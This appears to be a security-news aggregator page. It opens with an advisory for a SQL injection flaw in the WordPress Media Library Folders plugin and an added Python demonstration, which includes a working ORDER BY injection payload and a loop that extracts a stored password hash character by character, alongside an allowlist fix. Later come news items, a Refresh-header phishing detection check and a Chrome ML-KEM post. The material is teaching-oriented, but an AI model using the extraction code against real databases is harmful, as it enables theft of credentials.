The Media Library Folders plugin for WordPress is vulnerable to second order SQL Injection via the 'sort_type' parameter of the 'mlf_change_sort_type' AJAX action in all versions up to, and including, 8.2.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
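To make the second-order pattern concrete, here is an added example in Python over SQLite. It is an illustration of the vulnerability class, not the plugin's code: the table, option and function names are invented for the demonstration, and in a real WordPress plugin the sink would be a $wpdb query against MySQL, where a CASE expression in ORDER BY behaves the same way. The first-order write is parameterised and is not itself injectable; the defect is that the stored value is later concatenated into an ORDER BY clause, where the row order becomes a yes/no oracle that any user allowed to call the action can use to read other columns one character at a time. The hardened version validates against an allowlist when the value is stored and again when it is read back.

```python
import sqlite3

# Hypothetical allowlist of sort keys and directions (names are illustrative).
SORT_COLUMNS = {"name": "name", "date": "created", "size": "size"}
SORT_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}
OPTION_NAME = "demo_sort_type"   # stands in for a stored plugin option


def setup_db():
    """Constructed sample schema: an options table, a media table and a users table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE options (name TEXT PRIMARY KEY, value TEXT);
        CREATE TABLE media (id INTEGER PRIMARY KEY, name TEXT, created TEXT, size INTEGER);
        CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, pass TEXT);
        INSERT INTO media VALUES (1, 'a.png', '2024-01-01', 10),
                                 (2, 'b.png', '2024-02-01', 20),
                                 (3, 'c.png', '2024-03-01', 30);
        INSERT INTO users VALUES (1, 'admin', '$P$Bsecret');
    """)
    return db


# --- vulnerable pattern -------------------------------------------------------

def save_sort_type_vulnerable(db, sort_type):
    # First-order write: parameterised, so this statement is not injectable.
    # The bug is that the value is accepted without validation and trusted later.
    db.execute("INSERT OR REPLACE INTO options (name, value) VALUES (?, ?)",
               (OPTION_NAME, sort_type))


def list_media_vulnerable(db):
    # Second-order sink: the stored value is read back and concatenated into ORDER BY.
    (sort_type,) = db.execute("SELECT value FROM options WHERE name = ?",
                              (OPTION_NAME,)).fetchone()
    rows = db.execute("SELECT id FROM media ORDER BY " + sort_type)
    return [r[0] for r in rows]


def infer_char(db, position, alphabet):
    """Boolean-based extraction through ORDER BY: the row order reveals the comparison."""
    for c in alphabet:
        payload = (f"(CASE WHEN (SELECT substr(pass, {position}, 1) FROM users WHERE id = 1)"
                   f" = char({ord(c)}) THEN id ELSE -id END)")
        save_sort_type_vulnerable(db, payload)       # attacker sets the sort type
        if list_media_vulnerable(db) == [1, 2, 3]:    # the later listing leaks the answer
            return c
    return None


def extract_prefix(db, length, alphabet):
    """Recover the first `length` characters of the stored hash, one oracle query per guess."""
    return "".join(infer_char(db, i, alphabet) or "?" for i in range(1, length + 1))


# --- hardened pattern ---------------------------------------------------------

def parse_sort_type(sort_type):
    """Map 'column_direction' to SQL fragments from the allowlist, or None if invalid."""
    column, _, direction = sort_type.partition("_")
    if column in SORT_COLUMNS and direction in SORT_DIRECTIONS:
        return SORT_COLUMNS[column], SORT_DIRECTIONS[direction]
    return None


def save_sort_type_safe(db, sort_type):
    if parse_sort_type(sort_type) is None:
        raise ValueError("sort_type not in allowlist")
    db.execute("INSERT OR REPLACE INTO options (name, value) VALUES (?, ?)",
               (OPTION_NAME, sort_type))


def list_media_safe(db):
    row = db.execute("SELECT value FROM options WHERE name = ?", (OPTION_NAME,)).fetchone()
    # Validate again at the sink: the stored value may predate the fix or come from
    # another write path, so the read side must not trust it either.
    parsed = parse_sort_type(row[0]) if row else None
    column, direction = parsed if parsed else ("name", "ASC")
    rows = db.execute(f"SELECT id FROM media ORDER BY {column} {direction}")
    return [r[0] for r in rows]
```

The point of validating at both ends is that escaping does not help here: the value is never inside a string literal, so only an allowlist of column names and directions, applied where the SQL is actually built, closes the sink.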

Security News

The latest cybersecurity news, collected from a wide range of security websites.

The Port of Seattle released a statement Friday confirming that it was targeted by a ransomware attack. The attack occurred on August 24, with the Port (which also operates the Seattle-Tacoma International Airport) saying it had “experienced certain system outages indicating a possible cyberattack.” The Port is now describing this as “a ‘ransomware’ attack by […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Port of Seattle confirmed on Friday that the Rhysida ransomware group was behind the cyberattack that hit the agency in August. In August, a cyberattack hit the Port of Seattle, which also operates the Seattle-Tacoma International Airport; websites and phone systems were impacted. Media reported that the Port of Seattle, which also operates the […]

by Security Affairs

A recently fixed “Windows MSHTML spoofing vulnerability” tracked under CVE-2024-43461 is now marked as previously exploited after it was used in attacks by the Void Banshee APT hacking group. [...]

by BleepingComputer

Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape.

Mythical Beasts and Where to Find Them: Mapping the Global Spyware Market and its Threats to National Security and Human Rights
Dissecting Lumma Malware: Analyzing the Fake CAPTCHA and Obfuscation Techniques – Part 2
Predator Spyware […]

by Security Affairs

When we asked Betania Allo (Founder and Principal Consultant, BA Cyber Law & Policy) to share her perspective on the new UN Convention Against Cybercrime, she told us how it might align with existing cybersecurity agreements and regional differences in cyber law. “Generally speaking, while international and regional frameworks provide a general structure, local regulations must be adapted to the specific legal, cultural, and technological contexts of each country,” Betania said. “Together with investment in capacity building, it ensures that the regulations are practical and enforceable.” But when the convention must be integrated into national regulations in a localised way, how can we measure its success?

How do you perceive the alignment between the new UN Cybercrime Convention and existing regulations, like the EU’s AI Act, in addressing AI-driven cyber threats?

“Once ratified, the provisions of the Convention must be incorporated into the national legal framework. This involves drafting and enacting new laws or amending existing ones to align with the convention’s requirements. But what happens with existing legislation?

“Regional regulations, like the European Union’s AI Act, play a crucial role in complementing and enhancing the effectiveness of international instruments like the UN Cybercrime Convention. The AI Act is significant because it categorises AI systems into different risk levels, with stringent regulations for high-risk applications like deepfakes and autonomous cyber-attacks.

“This creates a robust legal framework that not only addresses AI-related threats but also sets a precedent for other regions and countries to follow.

“I also think that the EU has done it again by being at the forefront in regulating AI and providing a model for others, encouraging harmonisation of standards and practices across borders. This helps prevent regulatory gaps that could be exploited by cybercriminals, ensuring a more unified approach to tackling AI-driven cyber threats globally.

“The good news is that its provisions on AI-related crimes align with and support the goals of the UN Cybercrime Convention. By criminalising specific AI-driven activities, such as the non-consensual dissemination of intimate images through deepfakes, the AI Act strengthens the convention’s effectiveness at the local level.

“This alignment between regional and international regulations ensures that there are comprehensive measures in place to protect individuals and societies from the malicious use of AI technologies.”

How do we measure success, knowing that Member States will have to develop local regulations that reflect the goals of this Convention?

“The success of international conventions and regional regulations depends on the ability of each individual state to develop local regulations that reflect the spirits of these frameworks.

“Generally speaking, while international and regional frameworks provide a general structure, local regulations must be adapted to the specific legal, cultural, and technological contexts of each country. Together with investment in capacity building, it ensures that the regulations are practical and enforceable.

“Now, given the cross-border nature of cyber threats, international cooperation is essential. States must work together, sharing information and best practices, to address cybercrime effectively. This alignment ensures that evolving cyber threats are effectively managed at both the national and international levels, protecting individuals and promoting a safer global digital environment.

“States are encouraged to develop local regulations that embody the principles of these frameworks, fostering a cohesive and resilient response to the challenges of modern cybersecurity.”

Digital evidence is the cornerstone of cybercrime investigations. Why is it so crucial and what does the Convention reveal about this?

“The Convention represents a fundamental advancement in the global effort to address the complexities of cross-border digital evidence. It is particularly noteworthy for its attempts to create a cohesive and cooperative international framework that complements and enhances existing local and regional regulations.

“One of the most important advances in the Convention is the establishment of comprehensive mechanisms for the mutual legal assistance (MLA) process in relation to cross-border digital evidence. Articles 28 to 30 discussed before are critical because they set out the procedures for obtaining and sharing digital evidence across national borders, ensuring that such processes are carried out in a manner consistent with international standards.

“The inclusion of these articles reflects a recognition of the need for greater international cooperation in cybercrime investigations, where evidence often spans multiple jurisdictions.

“Naturally, these advances are designed to complement and integrate with existing local and regional regulations. For instance, the European Union’s General Data Protection Regulation (GDPR) and the European Investigation Order (EIO) provide a robust framework for the protection of personal data and the sharing of evidence within the EU. The UN Convention builds on these principles by extending similar protections and cooperation mechanisms to a global scale. Upon ratification, the Convention’s provisions could enhance the effectiveness of these existing regulations by facilitating more streamlined and legally consistent cross-border evidence sharing.

“Other regions with their own legal frameworks would benefit from the Convention’s standardised procedures for handling cross-border data requests. The Convention also emphasises the importance of capacity-building and technical assistance, particularly for developing countries, to ensure that all Member States can effectively participate in and benefit from these advanced mechanisms.

“This focus on capacity-building is essential for bridging the gap between nations with varying levels of technological and legal infrastructure, fostering a more inclusive and effective global cybercrime response.”

P.S. - Mark your calendars for the return of Black Hat MEA in November 2024. Want to be a part of the action? Register now!

by HACKLIDO

Here’s an overview of some of last week’s most interesting news, articles, interviews and videos:

Veeam Backup & Replication RCE flaw may soon be leveraged by ransomware gangs (CVE-2024-40711)
CVE-2024-40711, a critical vulnerability affecting Veeam Backup & Replication (VBR), could soon be exploited by attackers to steal enterprise data.

Microsoft fixes 4 exploited zero-days and a code defect that nixed earlier security fixes
September 2024 Patch Tuesday is here and Microsoft has delivered 79 fixes, … More →

The post Week in review: Veeam Backup & Replication RCE could soon be exploited, Microsoft fixes 4 0-days appeared first on Help Net Security.

by Help Net Security

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press.

U.S. CISA adds Ivanti Cloud Services Appliance Vulnerability to its Known Exploited Vulnerabilities catalog
Ivanti Cloud Service Appliance […]

by Security Affairs

Learn how Darktrace AI outsmarts impersonation tactics in cybersecurity. Discover cutting-edge security insights and how to keep yourself safe.

by Darktrace

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Ivanti Cloud Services Appliance Vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Ivanti Cloud Services Appliance OS Command Injection Vulnerability CVE-2024-8190 (CVSS score of 7.2) to its Known Exploited Vulnerabilities (KEV) catalog. This week, Ivanti warned that recently patched flaw […]

by Security Affairs

Ivanti warned that recently patched flaw CVE-2024-8190 in Cloud Service Appliance (CSA) is being actively exploited in the wild. Ivanti warned that a newly patched vulnerability, tracked as CVE-2024-8190 (CVSS score of 7.2), in its Cloud Service Appliance (CSA) is being actively exploited. “Following public disclosure, Ivanti has confirmed exploitation of this vulnerability in the […]

by Security Affairs

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are alerting the public of false claims that the U.S. voter registration data has been compromised in cyberattacks. [...]

by BleepingComputer

A malware campaign uses the unusual method of locking users in their browser's kiosk mode to annoy them into entering their Google credentials, which are then stolen by information-stealing malware. [...]

by BleepingComputer

Ivanti has revealed that a newly patched security flaw in its Cloud Service Appliance (CSA) has come under active exploitation in the wild. The high-severity vulnerability in question is CVE-2024-8190 (CVSS score: 7.2), which allows remote code execution under certain circumstances. “An OS command injection vulnerability in Ivanti Cloud Services Appliance versions 4.6 Patch 518 and before allows

by The Hacker News

Plus: New evidence emerges about who may have helped 9/11 hijackers, UK police arrest a teen in connection with an attack on London’s transit system, and Poland’s spyware scandal enters a new phase.

by WIRED Security News

From durable laptops to noise-canceling headphones and smart alarms, here's a list of must-have tech to keep you connected, focused, and prepared for whatever college throws your way.

by ITPro Today

In a recent interview with The Cyber Express on the show Security Pill, Manish Chachada, Co-Founder and COO of Cyble, provided key insights into the implications of MasterCard’s acquisition of Recorded Future. This marks a significant shift in the cyber threat intelligence market, particularly for financial institutions. While acknowledging the benefits of such acquisitions, Manish emphasized Cyble’s choice to remain independent for agility and innovation, enabling real-time decision-making and customization for clients. He highlighted how AI has shaped Cyble’s growth, setting them apart from competitors. Acquisitions, while strategic, often come with challenges, including shifts in priorities and innovation hurdles. Manish urged businesses to stay informed, adapt to changing market dynamics, and evaluate how these moves impact their operations. Cyble’s AI-driven approach to threat intelligence continues to play a crucial role in its differentiation from industry competitors, providing flexible and robust solutions tailored to emerging cybersecurity threats. This acquisition, like others in 2024, reflects the growing importance of cybersecurity within financial institutions and the broader business landscape. However, Cyble’s commitment to independence ensures it remains agile, helping clients navigate new challenges and changes in the market.

by The Cyber Express

Fortinet, a multinational cybersecurity firm and the world’s seventh largest retail IT company, has confirmed that it’s been hacked, according to reports. The news of this major breach at a company whose business model is built on keeping corporate networks safe is an ominous sign of where digital security is headed now. The company’s data […] The post Fortinet Data Breach: A Wake-Up Call for Cybersecurity Firms appeared first on ThreatMon Blog.

by ThreatMon

GitLab addressed multiple vulnerabilities impacting GitLab CE/EE, including a critical pipeline execution issue. GitLab released security patches for 17 vulnerabilities in GitLab CE (Community Edition) and EE (Enterprise Edition). One of these vulnerabilities is a critical pipeline execution flaw, tracked as CVE-2024-6678 (CVSS score of 9.9), that could allow an attacker to trigger a pipeline […]

by Security Affairs

Learn how internal phishing can compromise accounts swiftly & how Darktrace/Apps can prevent future attacks effectively.

by Darktrace

Darktrace highlights a handful of data theft incidents on shared cloud platforms, showing that cloud computing can be a vulnerable place for modern extortion.

by Darktrace

After months of regulatory discussions, Meta is pushing forward with its generative AI plans, leveraging public content from UK Facebook and Instagram users. The company is eager to resume AI training in the UK—though not without fresh oversight and transparency measures. The UK Information Commissioner’s Office (ICO) has been closely watching Meta’s efforts. In June, Meta paused its AI training plans after a request from the ICO. The company has since modified its approach, streamlining its objection form and extending the time frame for users to opt out. The move reflects the complex interplay between tech giants and data privacy regulators as AI models evolve. While Meta touts its transparent approach to AI, privacy concerns remain at the forefront.

Meta's Push for AI Training in the UK

Meta’s latest statement shows the tech giant's intent to build AI products that mirror British culture, idioms, and history. By incorporating public content shared by adult users on its platforms, Meta hopes to tailor its generative AI models for the UK market. These models won’t just serve everyday users—they’re designed to enhance AI products for businesses and institutions across the region. By using public posts, comments, and captions, Meta said, it intends to ensure that its AI better reflects the diversity of the UK. It’s not just the technology that has evolved, but the process behind it. Meta incorporated feedback from the ICO to make its operations more transparent. The company will now notify users via in-app alerts, providing an option to object to their data being used.

Regulatory Approval Awaited

Since pausing its AI training earlier this year, Meta has engaged in extensive discussions with the ICO. In response, the company has improved its user-facing transparency measures. Meta’s approach—while already more transparent than that of other industry counterparts, according to its June statement—now includes a simplified, easily accessible objection form. “We’ve incorporated feedback from the ICO to make our objection form even simpler, more prominent and easier to find,” Meta said, pledging to honor all objections previously submitted. This move aligns with Meta’s broader strategy to maintain compliance with the UK’s data protection framework while continuing to develop cutting-edge AI. But despite these updates, the ICO has yet to grant regulatory approval, signaling that the tech giant remains under the watchful eye of data protection authorities.

Legitimate Interests: The Legal Foundation

One of the core issues that emerged during Meta’s dialogue with the ICO was the legal basis for using UK user data. The company has opted to rely on “Legitimate Interests” under UK General Data Protection Regulation (GDPR) as the legal foundation for its AI data processing. Legitimate Interests allows organizations to use personal data without explicit user consent, provided that it meets a set of criteria. According to Meta, this legal pathway strikes the right balance between innovation and user rights, particularly when using publicly available data. It’s a common method for processing large-scale data while respecting individual privacy. Still, privacy activists have voiced concerns about this approach. They argue that the nature of AI models—trained on vast datasets—could undermine individual privacy, even if the data used is technically “public.”

Broader Context: Meta’s AI Strategy in Europe

Meta’s AI push in the UK mirrors its broader strategy in Europe. In a June statement, the company expressed frustration with regulatory delays across the continent, particularly in Ireland, where Meta has paused AI training for the European Union. “Our approach is more transparent and offers easier controls than many of our industry counterparts already training their models on similar publicly available information,” Meta said at the time. “We remain highly confident that our approach complies with European laws and regulations... This is a step backwards for European innovation, competition in AI development and further delays bringing the benefits of AI to people in Europe.” This tension between regulation and innovation is playing out across the tech industry. Google, OpenAI, and other major players have similarly faced challenges navigating Europe’s stringent data protection rules. On the same day that Meta announced its resumption of AI training in the UK, the Irish data regulator launched an investigation to determine Google's compliance with a European privacy law. The Irish Data Protection Commission on Thursday said it is probing whether Google assessed privacy risks ahead of developing the Pathways Language Model. Google launched the PaLM multilingual generative AI model last year. The model can reason and code and is integrated with 25 Google products. Meta, however, frames its efforts as vital for European innovation. “Without including local information we’d only be able to offer people a second-rate experience,” the company explained. It stressed that AI built without European input would fall short in recognizing local languages, humor, and cultural references.

The ICO's Position

The ICO’s stance on AI model training has been clear: transparency and user control must come first. Stephen Almond, the ICO’s Executive Director of Regulatory Risk, reiterated this after Meta’s latest statement. “Any organisation using its users’ information to train generative AI models needs to be transparent about how people’s data is being used,” Almond said. The ICO said that it had not granted formal approval for Meta’s resumed AI training and would continue to monitor the situation closely. Meta has responded by asserting that its latest adjustments, including more robust notifications and a streamlined objection process, address these regulatory concerns. The company remains optimistic about its prospects in the UK, believing it has struck the right balance between innovation and compliance.

Looking Ahead

As Meta resumes AI training in the UK, the move sets the stage for a larger conversation about AI governance, privacy, and the role of regulatory bodies. Will the UK’s cautious but progressive approach serve as a model for other countries navigating the delicate balance between AI development and privacy? For Meta, the stakes are high. If successful, its AI products could reshape how businesses and individuals interact with technology. If not, the company may face further regulatory roadblocks, both in the UK and across Europe. With AI shaping up to be the next frontier of technological innovation, how companies like Meta navigate these challenges will be crucial. And as regulators keep a close eye on these developments, the future of AI—and data privacy—remains uncertain.

by The Cyber Express

Satellite launching in 2026 aims to prove technology with applications in agriculture, climate science, navigation and secure communication.

by ITPro Today

In the wake of the devastating CrowdStrike meltdown earlier this year, Microsoft convened a meeting with leaders from the endpoint security business. Did anything useful come of it?

by ZDNET Security

The incident is a reminder why organizations need to pay attention to how they store and secure data in SaaS and cloud environments.

by Dark Reading

Apple said there's “too significant a risk” of exposing the anti-exploit work needed to fend off the very adversaries involved in the case. The post Apple Suddenly Drops NSO Group Spyware Lawsuit appeared first on SecurityWeek.

by SecurityWeek

Details have emerged about a now-patched security flaw impacting Apple's Vision Pro mixed reality headset that, if successfully exploited, could allow malicious attackers to infer data entered on the device's virtual keyboard. The attack, dubbed GAZEploit, has been assigned the CVE identifier CVE-2024-40865. “A novel attack that can infer eye-related biometrics from the avatar image to

by The Hacker News

British authorities on Thursday announced the arrest of a 17-year-old male in connection with a cyber attack affecting Transport for London (TfL). “The 17-year-old male was detained on suspicion of Computer Misuse Act offenses in relation to the attack, which was launched on TfL on 1 September,” the U.K. National Crime Agency (NCA) said. The teenager, who's from Walsall, is said to have been

by The Hacker News

Port of Seattle, the United States government agency overseeing Seattle's seaport and airport, confirmed on Friday that the Rhysida ransomware operation was behind a cyberattack impacting its systems over the last three weeks. [...]

by BleepingComputer

Security providers and regulators attended the Windows Endpoint Security Ecosystem Summit earlier this week.

by SC Media

In this case study, a CISO helps a B2B marketing automation company straighten out its manual compliance process by automating it.

by Dark Reading

The FBI received some 69,000 cryptocurrency related complaints on the year.

by SC Media

Collection of 40,000+ Nuclei templates, Extracting Data from Targets, Using Nuclei for OSINT, and more...

by Hive Five

A new Linux malware called Hadooken targets Oracle WebLogic servers, it has been linked to several ransomware families. Aqua Security Nautilus researchers discovered a new Linux malware, called Hadooken, targeting Weblogic servers. The name comes from the attack “surge fist” in the Street Fighter series. Upon execution, the malware drops a Tsunami malware and deploys […]

by Security Affairs

The FBI and CISA are warning citizens of attempts to convince voters that US election infrastructure has been compromised. (It hasn't been.)

by Dark Reading

Microsoft is revamping how anti-malware tools interact with the Windows kernel to avoid another CrowdStrike faulty update catastrophe.  The post Post-CrowdStrike Fallout: Microsoft Redesigning EDR Vendor Access to Windows Kernel appeared first on SecurityWeek.

by SecurityWeek

As the 104th season of the National Football League kicks off, expect cyberattacks aimed at its customers, players, and arenas.

by Dark Reading

At Oracle's CloudWorld 2024, the focus wasn't on any one cloud but on the expanding nature of the cloud to support customer requirements.

by ITPro Today

​Transport for London (TfL) says that all staff (roughly 30,000 employees) must attend in-person appointments to verify their identities and reset passwords following a cybersecurity incident disclosed almost two weeks ago. [...]

by BleepingComputer

Even as cyber threats become increasingly sophisticated, the number one attack vector for unauthorized access remains phished credentials (Verizon DBIR, 2024). Solving this problem resolves over 80% of your corporate risk, and a solution is possible.  However, most tools available on the market today cannot offer a complete defense against this attack vector because they were architected to

by The Hacker News

Cybersecurity researchers have uncovered a new variant of an Android banking trojan called TrickMo that comes packed with new capabilities to evade analysis and display fake login screens to capture victims' banking credentials. “The mechanisms include using malformed ZIP files in combination with JSONPacker,” Cleafy security researchers Michele Roviello and Alessandro Strino said. “In addition,

by The Hacker News

Malicious actors are likely leveraging publicly available proof-of-concept (PoC) exploits for recently disclosed security flaws in Progress Software WhatsUp Gold to conduct opportunistic attacks. The activity is said to have commenced on August 30, 2024, a mere five hours after a PoC was released for CVE-2024-6670 (CVSS score: 9.8) by security researcher Sina Kheirkhah of the Summoning Team, who

by The Hacker News

A newly identified technique used by credential-stealing malware forces users to input their login credentials into their browsers, allowing attackers to harvest this sensitive data. This method, uncovered by security researchers on August 22, 2024, uses an AutoIt script, in conjunction with the Stealc malware, to target and compromise victims' credential stores by exploiting browser … The post New AutoIt Malware Forces Users to Surrender Credentials in Kiosk Mode appeared first on CyberInsider.

by Cyber Insider

The FBI’s Internet Crime Complaint Center (IC3) has released an alarming update on Business Email Compromise (BEC) scams, revealing that these schemes have now led to over $55 billion in reported losses worldwide between October 2013 and December 2023. This marks a significant rise in BEC-related crimes, which continue to target businesses and individuals by … The post FBI Issues Warning as Business Email Compromise Losses Reach $55 Billion appeared first on CyberInsider.

by Cyber Insider

Microsoft has officially announced the deprecation of several legacy Digital Rights Management (DRM) services, which will affect users of Windows Media Player, Silverlight, and older Windows versions like Windows 7 and 8. The services are being phased out as part of Microsoft’s broader initiative to modernize its digital content protection infrastructure. This deprecation impacts various … The post Microsoft to Deprecate Legacy DRM for Media Player on Windows 7, 8 appeared first on CyberInsider.

by Cyber Insider

Kawasaki Motors Europe (KME) recently revealed it was the target of a ransomware attack that occurred at the start of the month. While the company has stated that the attack was not entirely successful, it resulted in a temporary isolation of their servers to prevent further damage. The ransomware group behind the attack has since … The post Kawasaki Motors Europe Hit by RansomHub Ransomware Attack appeared first on CyberInsider.

by Cyber Insider

Car manufacturer Ford Motor Company has filed a patent application for an in-vehicle advertisement presentation system based on information derived from...

by Malwarebytes Labs

by Mike Saunders, Principal Security Consultant

This blog is the thirteenth in a series of blogs on obfuscation techniques for hiding shellcode. You can find the rest of […]

by Red Siege Blog

A new Android malware called Trojan Ajina.Banker is targeting Central Asia – Discover how this malicious malware disguises…

by Hackread

In August, we recorded a total of 442 ransomware victims, the second-most all year.

by ThreatDown

Security pros called this GitLab patch an urgent one because an exploited CI/CD pipeline could lead to a serious supply chain compromise.

by SC Media

The federal indictment of two alleged members of the Terrorgram Collective, a far-right cell accused of inspiring “lone wolf” attacks, reveals the US is now using a “forgotten” legal strategy.

by WIRED Security News

The newest iPhone comes with a hardware-based security feature to better ensure user privacy.

by ZDNET Security

DNA testing giant 23andMe has agreed to pay $30 million to settle a lawsuit over a data breach that exposed the personal information of 6.4 million customers in 2023. [...]

by BleepingComputer

On Thursday, cybersecurity giant Fortinet disclosed a breach involving customer data.  In a statement posted online, Fortinet said an individual intruder accessed “a limited number of files” stored on a third-party shared cloud drive belonging to Fortinet, which included data belonging to “less than 0.3%” of its customers. The company said that the incident “did […]

by TechCrunch

Lehigh Valley Health Network ’s (LVHN) hospital network has agreed to a $65 million settlement in a class action lawsuit related to a data breach. Lehigh Valley Health Network (LVHN) is a large hospital and healthcare system based in Pennsylvania, USA. It operates numerous hospitals, health centers, and outpatient facilities across the region, including the […]

by Security Affairs

Developing secure software is not a game. Or is it? Enter the futuristic world of The Helix Files to join the secretive Helix organization and choose your own adventure to help save humanity from AI-accelerated collapse—all while racing against the clock and maintaining maximum security. Before you jump in, here is your briefing to get you up to speed on the events that got us where we are today in 2035. The post The Helix Files: Choose Your Own Adventure appeared first on Invicti.

by Invicti

To prevent this, organizations should focus on developing secure hardware and firmware foundations, enabling them to manage, monitor, and remediate hardware and firmware security.

by Dark Reading

Ivanti confirmed on Friday that a high severity vulnerability in its Cloud Services Appliance (CSA) solution is now actively exploited in attacks. [...]

by BleepingComputer

Detection rules are the backbone of modern Security Operations Centers (SOCs), serving as the eyes and ears for threat detection and response. However, ensuring these rules function as intended can be challenging. Many SIEM systems lack advanced validation mechanisms, resulting in undetected threats and a false sense of security. In our research for the Blue Report 2024, we identified the most common issues affecting the effectiveness of detection rules within SIEM systems.

by Picus Security

Researchers at Palo Alto Networks’ Unit 42 warn that attackers are using refresh entries in HTTP response headers to automatically redirect users to phishing pages without user interaction.
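As an added example of a check for the technique described (my code, not Unit 42's or KnowBe4's), the following Python classifies a raw HTTP response by whether its Refresh header sends the browser to a different host from the one the request was made to. The sample responses are constructed for the demonstration; the hostnames in them use reserved test domains.

```python
import re
from urllib.parse import urlparse

# Refresh header value grammar as browsers accept it: "<delay>" or "<delay>; url=<target>".
# The separator may be ';' or ',', "url=" is case-insensitive and the target may be quoted.
_REFRESH_RE = re.compile(r"^\s*(\d+)\s*(?:[;,]\s*url\s*=\s*(.*))?$", re.IGNORECASE)

# Constructed sample responses (not captured traffic). The mailed link points at a host the
# victim trusts; the response body is empty and the Refresh header does the redirect.
SAMPLE_CROSS_ORIGIN = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Refresh: 0; url=https://login.example-phish.test/?e=user@corp.example\r\n"
    "\r\n"
)
SAMPLE_SAME_ORIGIN = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Refresh: 5; URL='/account/login'\r\n"
    "\r\n<html></html>"
)
SAMPLE_NO_REFRESH = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html></html>"


def parse_headers(raw_response):
    """Split a raw HTTP response head into (status_line, [(lowercased name, value), ...])."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def parse_refresh(value):
    """Return (delay_seconds, target_or_None) from a Refresh value, or None if malformed."""
    m = _REFRESH_RE.match(value)
    if not m:
        return None
    target = (m.group(2) or "").strip().strip("'\"")
    return int(m.group(1)), (target or None)


def check_refresh_redirect(raw_response, request_host):
    """Classify a response as 'none', 'same-origin' or 'cross-origin' by its Refresh header.

    'cross-origin' with delay 0 is the pattern in the report: the page the user was sent
    to never renders and the browser moves to another host with no click, which detection
    that only looks at 3xx status codes and Location headers will not see as a redirect.
    """
    _, headers = parse_headers(raw_response)
    result = {"verdict": "none", "delay": None, "target": None}
    for name, value in headers:
        if name != "refresh":
            continue
        parsed = parse_refresh(value)
        if parsed is None or parsed[1] is None:
            break                              # a bare "Refresh: 30" reloads, it does not redirect
        delay, target = parsed
        target_host = urlparse(target).hostname
        cross = target_host is not None and target_host.lower() != request_host.lower()
        result.update(verdict="cross-origin" if cross else "same-origin",
                      delay=delay, target=target)
        break
    return result
```

Run it over proxy or sandbox captures keyed by the request's Host header; a zero-delay cross-origin verdict on a URL that arrived by email is the case to alert on. The same check belongs on `<meta http-equiv="refresh">` in the body, which this snippet does not parse.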

by KnowBe4

Noteworthy stories that might have slipped under the radar: a possible Adobe Reader zero-day, researchers mistakenly hijack .mobi TLD, and an exploited WhatsApp View Once bypass. The post In Other News: Possible Adobe Reader Zero-Day, Hijacking Mobi TLD, WhatsApp View Once Exploit appeared first on SecurityWeek.

by SecurityWeek

Hackers are targeting Oracle WebLogic servers to infect them with a new Linux malware named "Hadooken," which launches a cryptominer and a tool for distributed denial-of-service (DDoS) attacks. [...]

by BleepingComputer

It’s not just government organizations that need to worry about cyber espionage campaigns — the entire business world is also a target. Multipolarity has been a defining trend in geopolitics in recent years. Rivalries between the world’s great powers continue to test the limits of globalism, resulting in growing disruption to international supply chains and […] The post What can businesses learn from the rise of cyber espionage? appeared first on Security Intelligence.

by Security Intelligence

With the US election on the horizon, it’s a good time to explore the concept of social media weaponization and its use in asymmetrically manipulating public opinion through bots, automation, AI, and shady new tools in what Trustwave SpiderLabs has dubbed the Distributed Denial of Truth (DDoT).

by SpiderLabs Blog

A cyberattack that shut down some of the top casinos in Las Vegas last year quickly became one of the most riveting security stories of 2023: It was the first known case of native English-speaking hackers in the United States and Britain teaming up with ransomware gangs based in Russia. But that made-for-Hollywood narrative has eclipsed a far more hideous trend: Many of these young, Western cybercriminals are also members of fast-growing online groups that exist solely to bully, stalk, harass and extort vulnerable teens into physically harming themselves and others.

by Krebs on Security

Apple has released a patch for Vision Pro after researchers showed how an attacker can obtain passwords typed by looking at keys. The post Apple Patches Vision Pro Vulnerability to Prevent GAZEploit Attacks appeared first on SecurityWeek.

by SecurityWeek

Posted by David Adrian, David Benjamin, Bob Beck & Devon O'Brien, Chrome Team

We previously posted about experimenting with a hybrid post-quantum key exchange, and enabling it for 100% of Chrome Desktop clients. The hybrid key exchange used both the pre-quantum X25519 algorithm, and the new post-quantum algorithm Kyber. At the time, the NIST standardization process for Kyber had not yet finished. Since then, the Kyber algorithm has been standardized with minor technical changes and renamed to the Module Lattice Key Encapsulation Mechanism (ML-KEM). We have implemented ML-KEM in Google’s cryptography library, BoringSSL, which allows for it to be deployed and utilized by services that depend on this library.

The changes to the final version of ML-KEM make it incompatible with the previously deployed version of Kyber. As a result, the codepoint in TLS for hybrid post-quantum key exchange is changing from 0x6399 for Kyber768+X25519, to 0x11EC for ML-KEM768+X25519. To handle this, we will be making the following changes in Chrome 131[1]:

- Chrome will switch from supporting Kyber to ML-KEM
- Chrome will offer a key share prediction for hybrid ML-KEM (codepoint 0x11EC)
- The PostQuantumKeyAgreementEnabled flag and enterprise policy will apply to both Kyber and ML-KEM
- Chrome will no longer support hybrid Kyber (codepoint 0x6399)

Chrome will not support Kyber and ML-KEM at the same time. We made this decision for several reasons:

- Kyber was always experimental, so we think continuing to support it risks ossification on non-standard algorithms.
- Post-quantum cryptography is too big to be able to offer two post-quantum key share predictions at the same time.
- Server operators can temporarily support both algorithms at the same time to maintain post-quantum security with a broader set of clients, as they update over time.

